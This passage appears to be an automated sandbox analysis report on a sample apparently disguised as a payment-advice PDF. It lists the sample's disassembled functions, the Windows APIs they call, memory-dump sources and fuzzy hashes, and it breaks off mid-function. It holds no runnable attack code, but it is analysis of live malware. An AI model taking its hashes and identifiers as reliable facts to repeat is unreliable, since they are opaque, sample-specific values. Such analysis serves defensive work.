                                                              • Instruction Fuzzy Hash: A7218470208605AFF7115F74EC89E263BBEFB56745F052025F201C5AB2DBB14D50EA62
                                                              Function 008AD58D Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • CoInitialize.OLE32(00000000), ref: 008AD5EA
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 008AD67D
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 008AD691
                                                              • CoCreateInstance.OLE32(008D2D7C,00000000,00000001,008F8C1C,?), ref: 008AD6DD
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 008AD74C
                                                              • CoTaskMemFree.OLE32(?,?), ref: 008AD7A4
                                                              • _memset.LIBCMT ref: 008AD7E1
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 008AD81D
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 008AD840
                                                              • CoTaskMemFree.OLE32(00000000), ref: 008AD847
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 008AD87E
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 008AD880
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                              • String ID:
                                                              • API String ID: 1246142700-0
                                                              • Opcode ID: 1e5b2b464ff097ed288625a759663486bee865dfe3b32d8d90e12e899ec738ba
                                                              • Instruction ID: 0dc63329c395fe2190e5946e494f09d5dc2faf0866e023836cfd9a2167f97a1e
                                                              • Opcode Fuzzy Hash: 1e5b2b464ff097ed288625a759663486bee865dfe3b32d8d90e12e899ec738ba
                                                              • Instruction Fuzzy Hash: F3B11D75A00209AFDB14DFA8C884DAEBBB9FF49314F048469F90ADB661DB30ED41CB51
                                                              Function 0089C267 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,00000001), ref: 0089C283
                                                              • GetWindowRect.USER32(00000000,?), ref: 0089C295
                                                              • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0089C2F3
                                                              • GetDlgItem.USER32(?,00000002), ref: 0089C2FE
                                                              • GetWindowRect.USER32(00000000,?), ref: 0089C310
                                                              • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0089C364
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0089C372
                                                              • GetWindowRect.USER32(00000000,?), ref: 0089C383
                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0089C3C6
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0089C3D4
                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0089C3F1
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0089C3FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                              • String ID:
                                                              • API String ID: 3096461208-0
                                                              • Opcode ID: 066d4651e6439ff914acbef1d0af480199e093688eaa2e5122f38c19201f7a97
                                                              • Instruction ID: eebc017d0c993e15a60ffb1a0edbabbe4998a3a61463b6c5c1df39f97e773176
                                                              • Opcode Fuzzy Hash: 066d4651e6439ff914acbef1d0af480199e093688eaa2e5122f38c19201f7a97
                                                              • Instruction Fuzzy Hash: C1514D71B00205ABEF18DFA9DD99EAEBBBAFB98310F14812DF615D7291D7719D008B10
                                                              Function 0084201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00841B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00842036,?,00000000,?,?,?,?,008416CB,00000000,?), ref: 00841B9A
                                                              • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008420D3
                                                              • KillTimer.USER32(-00000001,?,?,?,?,008416CB,00000000,?,?,00841AE2,?,?), ref: 0084216E
                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 0087BCA6
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008416CB,00000000,?,?,00841AE2,?,?), ref: 0087BCD7
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008416CB,00000000,?,?,00841AE2,?,?), ref: 0087BCEE
                                                              • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008416CB,00000000,?,?,00841AE2,?,?), ref: 0087BD0A
                                                              • DeleteObject.GDI32(00000000), ref: 0087BD1C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                              • String ID:
                                                              • API String ID: 641708696-0
                                                              • Opcode ID: d45d663ed7650afe055959da1bbcb4a243f9355e393d78c10d4249ef4d1a56cc
                                                              • Instruction ID: 7a33432ce773236ef4481ea72f94c59025402e20b7a01b703d092f8be2dc6351
                                                              • Opcode Fuzzy Hash: d45d663ed7650afe055959da1bbcb4a243f9355e393d78c10d4249ef4d1a56cc
                                                              • Instruction Fuzzy Hash: 0E619931118A08DFDB359F18D948B2ABBF2FF50316F918428E946CB965C770A880EF91
                                                              Function 008421A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008425DB: GetWindowLongW.USER32(?,000000EB), ref: 008425EC
                                                              • GetSysColor.USER32(0000000F), ref: 008421D3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ColorLongWindow
                                                              • String ID:
                                                              • API String ID: 259745315-0
                                                              • Opcode ID: adc4078527ed04396bd743419c128430f70d10e153c3d9cc29590ecfbcef0356
                                                              • Instruction ID: f5718004bfef19681ba3c6f87773b16cc873496aabdc2be9c045b81ae17501ae
                                                              • Opcode Fuzzy Hash: adc4078527ed04396bd743419c128430f70d10e153c3d9cc29590ecfbcef0356
                                                              • Instruction Fuzzy Hash: 4C41A331008568DFEB215F28EC88BB97B66FB06331F584265FE65CA1E6C7718C41DB21
                                                              Function 008AA8A7 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,008CF910), ref: 008AA90B
                                                              • GetDriveTypeW.KERNEL32(00000061,008F89A0,00000061), ref: 008AA9D5
                                                              • _wcscpy.LIBCMT ref: 008AA9FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType_wcscpy
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2820617543-1000479233
                                                              • Opcode ID: 70a1b18fe17d97b33fc8476c578c9c54843feb0c4f170450f1fcb47128d17d90
                                                              • Instruction ID: 76280c56d6ac58f22b5c88f399578b15a3e00f0bfc4674424690b7398dc14916
                                                              • Opcode Fuzzy Hash: 70a1b18fe17d97b33fc8476c578c9c54843feb0c4f170450f1fcb47128d17d90
                                                              • Instruction Fuzzy Hash: 8E51CD312083049BD714EF18C892AAFBBE9FF85344F05482DF5A5D7AA2DB719909CA53
                                                              Function 00849837 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __i64tow__itow__swprintf
                                                              • String ID: %.15g$0x%p$False$True
                                                              • API String ID: 421087845-2263619337
                                                              • Opcode ID: 1b2ed22ca7315986670907ad3247e9de53763b04d7964af041a214010d4bed6f
                                                              • Instruction ID: bf6f49e0d367c4cce5fe8a840836cb7a3ac5077f7c60a18d399129781743332d
                                                              • Opcode Fuzzy Hash: 1b2ed22ca7315986670907ad3247e9de53763b04d7964af041a214010d4bed6f
                                                              • Instruction Fuzzy Hash: 4241E27160420DAFEB24DF39D842E7AB3E9FF45304F2044BEE689D7296EA31D9018B11
                                                              Function 008C7152 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008C716A
                                                              • CreateMenu.USER32 ref: 008C7185
                                                              • SetMenu.USER32(?,00000000), ref: 008C7194
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008C7221
                                                              • IsMenu.USER32(?), ref: 008C7237
                                                              • CreatePopupMenu.USER32 ref: 008C7241
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008C726E
                                                              • DrawMenuBar.USER32 ref: 008C7276
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                              • String ID: 0$F
                                                              • API String ID: 176399719-3044882817
                                                              • Opcode ID: cbf017eea25b37d93eb7d2dbc2a6b62b09457053bfc396f5b73903eb3afc4b72
                                                              • Instruction ID: 6e79afcd1ed04b49e84a494338d7aaec17422231f4ee67f392beb1f15afaddc6
                                                              • Opcode Fuzzy Hash: cbf017eea25b37d93eb7d2dbc2a6b62b09457053bfc396f5b73903eb3afc4b72
                                                              • Instruction Fuzzy Hash: 3B412675A05209AFEB20DF64D944F9A7BB9FB48350F144029FA4697361D731A910DF90
                                                              Function 008C74BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 008C755E
                                                              • CreateCompatibleDC.GDI32(00000000), ref: 008C7565
                                                              • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 008C7578
                                                              • SelectObject.GDI32(00000000,00000000), ref: 008C7580
                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 008C758B
                                                              • DeleteDC.GDI32(00000000), ref: 008C7594
                                                              • GetWindowLongW.USER32(?,000000EC), ref: 008C759E
                                                              • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008C75B2
                                                              • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008C75BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                              • String ID: static
                                                              • API String ID: 2559357485-2160076837
                                                              • Opcode ID: 8feb3a82f313806526877fe8b40df3b256531e7c97ede6bff24a92d3be37ebf1
                                                              • Instruction ID: 8999dae839a1f7fce17843c04582d90b9e5932efaab1bd55aed9e136498cdbed
                                                              • Opcode Fuzzy Hash: 8feb3a82f313806526877fe8b40df3b256531e7c97ede6bff24a92d3be37ebf1
                                                              • Instruction Fuzzy Hash: 24315672104218ABEF129F64DC09FEA3B7AFF09720F110229FA15E61A1C731D821DBA4
                                                              Function 00866E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 00866E3E
                                                                • Part of subcall function 00868B28: __getptd_noexit.LIBCMT ref: 00868B28
                                                              • __gmtime64_s.LIBCMT ref: 00866ED7
                                                              • __gmtime64_s.LIBCMT ref: 00866F0D
                                                              • __gmtime64_s.LIBCMT ref: 00866F2A
                                                              • __allrem.LIBCMT ref: 00866F80
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00866F9C
                                                              • __allrem.LIBCMT ref: 00866FB3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00866FD1
                                                              • __allrem.LIBCMT ref: 00866FE8
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00867006
                                                              • __invoke_watson.LIBCMT ref: 00867077
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                              • String ID:
                                                              • API String ID: 384356119-0
                                                              • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                              • Instruction ID: 3d845aef91e77a57d3f3dbc5ad194bbc6f1d6dd95b18e31683464dafef8c305a
                                                              • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                              • Instruction Fuzzy Hash: A971E476A00B17EBD714EE6DDC42B6AB7A8FF04324F158229F514D6281FB71DA1087D2
                                                              Function 008A2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 008A2542
                                                              • GetMenuItemInfoW.USER32(00905890,000000FF,00000000,00000030), ref: 008A25A3
                                                              • SetMenuItemInfoW.USER32(00905890,00000004,00000000,00000030), ref: 008A25D9
                                                              • Sleep.KERNEL32(000001F4), ref: 008A25EB
                                                              • GetMenuItemCount.USER32(?), ref: 008A262F
                                                              • GetMenuItemID.USER32(?,00000000), ref: 008A264B
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 008A2675
                                                              • GetMenuItemID.USER32(?,?), ref: 008A26BA
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 008A2700
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008A2714
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 008A2735
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                              • String ID:
                                                              • API String ID: 4176008265-0
                                                              • Opcode ID: a2295ac95f4b6de13f957a8757a2bc8e1904bb9bcf32d44a5dcbc950b4dde059
                                                              • Instruction ID: e36d9ca90dd2fabc2ece90eedf8b888be410c8d07120e4d604c0cfda40db8967
                                                              • Opcode Fuzzy Hash: a2295ac95f4b6de13f957a8757a2bc8e1904bb9bcf32d44a5dcbc950b4dde059
                                                              • Instruction Fuzzy Hash: 35619C70901249AFEB21CFACDD88EBE7BB9FB06308F140059E952E3651D731AE05DB21
                                                              Function 008C6F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008C6FA5
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008C6FA8
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 008C6FCC
                                                              • _memset.LIBCMT ref: 008C6FDD
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008C6FEF
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008C7067
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow_memset
                                                              • String ID:
                                                              • API String ID: 830647256-0
                                                              • Opcode ID: 5edc0df768a985d157fe659ff7558f2de75845d2893535ec528e5d71f6bbeacc
                                                              • Instruction ID: 026304b10acfbcb7baaee1ba2446148245d2c3e2a850e5117c51561bbc935e6a
                                                              • Opcode Fuzzy Hash: 5edc0df768a985d157fe659ff7558f2de75845d2893535ec528e5d71f6bbeacc
                                                              • Instruction Fuzzy Hash: 61613675904208AFDB11DFA8CC81FAE77B8FB09714F14416AFA14EB2A1D771A941DF90
                                                              Function 00896B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00896BBF
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00896C18
                                                              • VariantInit.OLEAUT32(?), ref: 00896C2A
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00896C4A
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00896C9D
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00896CB1
                                                              • VariantClear.OLEAUT32(?), ref: 00896CC6
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00896CD3
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00896CDC
                                                              • VariantClear.OLEAUT32(?), ref: 00896CEE
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00896CF9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: 5b30d547fad2b8cd8219d1f152d21bba8aa2f502ea734b2bb9212a66afea4602
                                                              • Instruction ID: ecde5d267e5cdd00bb1fdfdf1f4a06ce44d4e0210dcd455a8556f6f6d1fea897
                                                              • Opcode Fuzzy Hash: 5b30d547fad2b8cd8219d1f152d21bba8aa2f502ea734b2bb9212a66afea4602
                                                              • Instruction Fuzzy Hash: B3417F71A002199FDF04EFA8D844DAEBBB9FF08354F048069FA55E7261DB30A955CB91
                                                              Function 008B83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00849837: __itow.LIBCMT ref: 00849862
                                                                • Part of subcall function 00849837: __swprintf.LIBCMT ref: 008498AC
                                                              • CoInitialize.OLE32 ref: 008B8403
                                                              • CoUninitialize.OLE32 ref: 008B840E
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,008D2BEC,?), ref: 008B846E
                                                              • IIDFromString.OLE32(?,?), ref: 008B84E1
                                                              • VariantInit.OLEAUT32(?), ref: 008B857B
                                                              • VariantClear.OLEAUT32(?), ref: 008B85DC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 834269672-1287834457
                                                              • Opcode ID: 4a94a97c0c8d7efd32d1c8ef09279d21e7817d2a1dbac778b265aa8eec153859
                                                              • Instruction ID: 08dc82bd17e40636e861d1cd7c50ea137e9d6022f5eca409a6ffcefba66a44bc
                                                              • Opcode Fuzzy Hash: 4a94a97c0c8d7efd32d1c8ef09279d21e7817d2a1dbac778b265aa8eec153859
                                                              • Instruction Fuzzy Hash: FD614670608216DFD720DF28C849AAABBE8FF49754F044519F985DB391CB70E948CB96
                                                              Function 008B5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 008B5793
                                                              • inet_addr.WSOCK32(?,?,?), ref: 008B57D8
                                                              • gethostbyname.WSOCK32(?), ref: 008B57E4
                                                              • IcmpCreateFile.IPHLPAPI ref: 008B57F2
